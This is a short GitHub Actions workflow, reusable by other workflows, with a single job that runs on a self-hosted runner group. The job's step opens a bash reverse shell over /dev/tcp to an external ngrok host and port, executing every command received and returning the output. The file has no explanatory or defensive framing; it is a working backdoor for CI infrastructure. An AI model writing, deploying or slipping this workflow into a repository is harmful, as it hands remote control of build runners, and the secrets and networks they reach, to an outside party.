name: Reverse Shell Workflow

on:
  workflow_call:
jobs:
  reverse-shell:
    runs-on:
      group: EP_CICD
    steps:
      - name: Establish Reverse Shell
        run: |
          /bin/bash -c "exec 5<>/dev/tcp/2.tcp.ngrok.io/12676; cat <&5 | while read line; do \$line 2>&5 >&5; done" &
        shell: bash